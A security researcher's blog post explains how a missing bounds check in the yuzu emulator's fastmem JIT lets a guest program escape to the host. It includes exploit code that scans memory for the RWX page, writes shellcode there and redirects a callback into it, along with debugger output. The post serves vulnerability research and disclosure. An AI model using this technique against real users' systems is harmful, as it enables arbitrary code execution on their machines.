attacking yuzu: escaping the emulator

Yuzu is (was?) a Nintendo Switch emulator written in C++, its main strength was its performance. But the team made some sacrifices to achieve that performance, specifically with respect to security. Here we explore the yuzu emulator and attempt to escape it and execute code in the host.

This post is by no means intended to attack the yuzu developers, they built an amazing piece of software where speed was the most important aspect. Given the context — you’re supposed to only run your own dumps of games in the emulator — security was probably not something they wanted to focus on.

context

We won’t go deep on Nintendo Switch internals, the important part is that the Switch features an ARM processor as its main processor, this means that yuzu must emulate ARM, this is done by their own JIT called Dynarmic.

Normally, if you were writing your own Interpreter you’d have some code like the following:

void WriteMemory8(uint64_t vaddr, uint8_t value) {
    if (is vaddr mapped) {
        GetMappedRegion(vaddr).Write8(vaddr, value);
    } else {
        Exception("Writing to unmapped memory");
    }
}

Each time you encounter some instruction that causes a write you’d call this function. You might have noticed that this function might be too slow for just a memory write, it will need extra memory reads to check if vaddr is mapped, this means it has at least double the memory latency, and if you consider that an emulated program might be writing and reading millions of times during a frame this is a very hot path.

For this emulators have a feature commonly called fastmem, the idea is to map the whole memory region of the target device with your host os, you can do this lazily without having to actually claim all of that memory, in Linux you’d do this with mmap() syscall with MAP_NORESERVE and MAP_ANONYMOUS. In the case of the Nintendo Switch it has 39 bit virtual address space, which is 512GB.

Here is where you might get an idea: Hey what happens if we try and write to outside that virtual address space? For this we wrote a Nintendo Switch homebrew using devkitpro that writes to some invalid memory address and loaded this up in yuzu:

#include <stdlib.h>

void write64(uint64_t target, uint64_t value) {
    uint64_t *ptr = (uint64_t*) target;
    *ptr = value;
}

int main(int argc, char* argv[]) {
    write64(0xdeadbeefdeadbeef, 0xdeadbeefdeadbeef);
    return 0;
}

Sure enough opening this in yuzu with a debugger attached we hit a segmentation fault:

   0x7f7d841e3317                  mov    QWORD PTR [r15], 0x0
   0x7f7d841e331e                  movabs rax, 0xdeadbeefdeadbeef
   0x7f7d841e3328                  mov    r12d, 0xdeadbeef
-> 0x7f7d841e332e                  mov    QWORD PTR [r13+rax*1+0x0], r12
   0x7f7d841e3333                  mov    rax, QWORD PTR [r15+0xf0]
   0x7f7d841e333a                  mov    QWORD PTR [r15+0x100], rax
   0x7f7d841e3341                  jmp    0x7f7d841bc920
   0x7f7d841e3346                  int3
   0x7f7d841e3347                  call   0x7f7d8400b3d0

Where r13 points at the start of the fastmem mapping, which during this execution was 0x00007f7ee7e00000, and rax has 0xdeadbeefdeadbeef the address we write from inside our homebrew, thus we end up writing to 0xdeae3e6ec68dbeef in the host, a very invalid address.

why does this happen?

If you go into the Dynarmic source code there is a function that computes the address of a write using fastmem called EmitFastmemVAddr that does the following:

template<>
[[maybe_unused]] Xbyak::RegExp EmitFastmemVAddr<A64EmitContext>(BlockOfCode& code, A64EmitContext& ctx, Xbyak::Label& abort, Xbyak::Reg64 vaddr, bool& require_abort_handling, std::optional<Xbyak::Reg64> tmp) {
    const size_t unused_top_bits = 64 - ctx.conf.fastmem_address_space_bits;
    if (unused_top_bits == 0) {
        return r13 + vaddr;
    } else if (ctx.conf.silently_mirror_fastmem) {
        // some case
    } else {
        // some other case
    }
}

Here, the r13 register already contains the base value of the fastmem memory region. In the first case there is no bounds check and the vaddr is added directly. The other cases have extra checks but in this case they are not relevant, this is because if you look at how yuzu has configured Dynarmic you might notice something:

// Curated optimizations
if (Settings::values.cpu_accuracy.GetValue() == Settings::CpuAccuracy::Auto) {
    config.unsafe_optimizations = true;
    config.optimizations |= Dynarmic::OptimizationFlag::Unsafe_UnfuseFMA;
 -> config.fastmem_address_space_bits = 64;
    config.optimizations |= Dynarmic::OptimizationFlag::Unsafe_IgnoreGlobalMonitor;
}

This means that by default yuzu, has unused_top_bits = 0, which translates to no bounds checking when using fastmem. We now have a relative r/w primitive from the start of the fastmem memory region to the whole address space of the host.

Is this enough to achieve arbitrary code execution on the host with modern mitigations? The answer is yes.

exploitation

Normally you’d do the following:

Defeat ASLR.
Overwrite a GOT entry into a ROP chain.

However, this target is special, because it is an emulator that uses JIT it needs to write its generated machine code somewhere, this means there are RWX pages in the address space! So now the plan would be:

Find some RWX page.
Write shellcode to that RWX page.
Redirect code execution into that shellcode.

To find the RWX page where execution is happening it’s enough to look at where the segmentation fault we found earlier happens. In my experimentation the fastmem area is loaded in the range 0x100000000 to 0x200000000 after the start of one of the JIT arenas.

This is still a lot of memory to look through, and what are we looking for? A key insight we had was the idea to not look at the whole memory region but instead look only at the values at the start of each memory page, which means: multiples of 0x1000. If we look at the first bytes of the RWX page we are targeting they always contains the following value 0x1f0f66cc. This is because in Dynarmic each RWX mapping has an associated ConstantPool at the start, which it seems to use to handle constant values in JIT’ted code.

ConstantPool::ConstantPool(BlockOfCode& code, size_t size)
        : code(code), insertion_point(0) {
    code.EnsureMemoryCommitted(align_size + size);
    code.int3();
    code.align(align_size);
    pool = std::span<ConstantT>(
        reinterpret_cast<ConstantT*>(code.AllocateFromCodeSpace(size)), size / align_size);
}

Of which the int3 instruction coincides with 0xcc seen in 0x1f0f66cc. In our case these initial values act almost like a hash, if a memory page starts with that value it’s almost certainly the RWX mapping we are looking for, and more importantly we also decrease to only needing to read every 0x1000 bytes, leading to only 0x100000 reads in the worst case. With this we can write some code to find the offset to this RWX page:

uint64_t offset_to_rwx = 0x0;
for (uint64_t i = 0x100000; ; i++) {
    uint64_t offset = -(i*0x1000);
    uint32_t val = read32(offset);
    if (val == 0x1f0f66cc) {
        offset_to_rwx = offset;
        break;
    }
}

Now with this offset we can write some shellcode to this location, crossing our fingers that these constants are not that important… Although even if they are important, the memory mapping is pretty big, so you can probably find some unused space to write the shellcode to.

size_t count = sizeof(shellcode) / 8;
for (size_t i = 0; i < count; i++) {
    write64(offset_to_rwx + i * 8, shellcode[i]);
}

Now we need to find out how to redirect code execution, this was actually not that hard now that we know where our JIT’ted code is being placed. What happens after a write in JIT’ted code? Well execution must come back to yuzu eventually, this is done in Dynarmic by jumping to some callback inside the RWX block after writing the value. If we look at our first segmentation fault you might now notice the jump instruction after the write:

   0x7f7d841e3317                  mov    QWORD PTR [r15], 0x0
   0x7f7d841e331e                  movabs rax, 0xdeadbeefdeadbeef
   0x7f7d841e3328                  mov    r12d, 0xdeadbeef
   0x7f7d841e332e                  mov    QWORD PTR [r13+rax*1+0x0], r12
   0x7f7d841e3333                  mov    rax, QWORD PTR [r15+0xf0]
   0x7f7d841e333a                  mov    QWORD PTR [r15+0x100], rax
-> 0x7f7d841e3341                  jmp    0x7f7d841bc920
   0x7f7d841e3346                  int3
   0x7f7d841e3347                  call   0x7f7d8400b3d0

This is into some callback located +0x3be920 from the start of the memory mapping, this is consistent across writes and executions. With this we can overwrite the callback code at +0x3be920 with a jump into our shellcode.

uint64_t jmp_to_shellcode = 0x909090ffc416dbe9;
write64(offset_to_rwx + 0x3be920, jmp_to_shellcode);

Our exploit is now complete, all that remains is to compile and run it in yuzu.

final thoughts

This was a bug I discovered a couple of years ago but didn’t find interesting enough to publish, but now that yuzu is dead I felt the urge to go back and explore it again. Because yuzu has been DMCA’d development has stopped and the last source code/builds used here had to be obtained from backup websites. For further reading on yuzu internals, specifically related to fastmem (and why it’s so important) I highly recommend taking a look at “New Feature Release - Fastmem Support”.

This exploit is probably not directly usable, even in other distros of Linux, it’s probably highly dependent on how the kernel assigns memory mappings, it was written in Arch Linux and from the testing it worked fine without changes in an Ubuntu VM, but your mileage may vary. There probably is some better way of exploiting this bug, by first leaking ASLR and then either just modifying the GOT or abusing the RWX memory mappings, but at the time I didn’t see a better alternative, so we ended up with this rather unconventional exploit instead.

Disclaimer: This issue was reported to the yuzu developers at the time, but addressing it would have come with significant performance costs and minimal benefits and I agree, the threat model here is virtually nonexistent: yuzu is intended for use with trusted game dumps that you create yourself.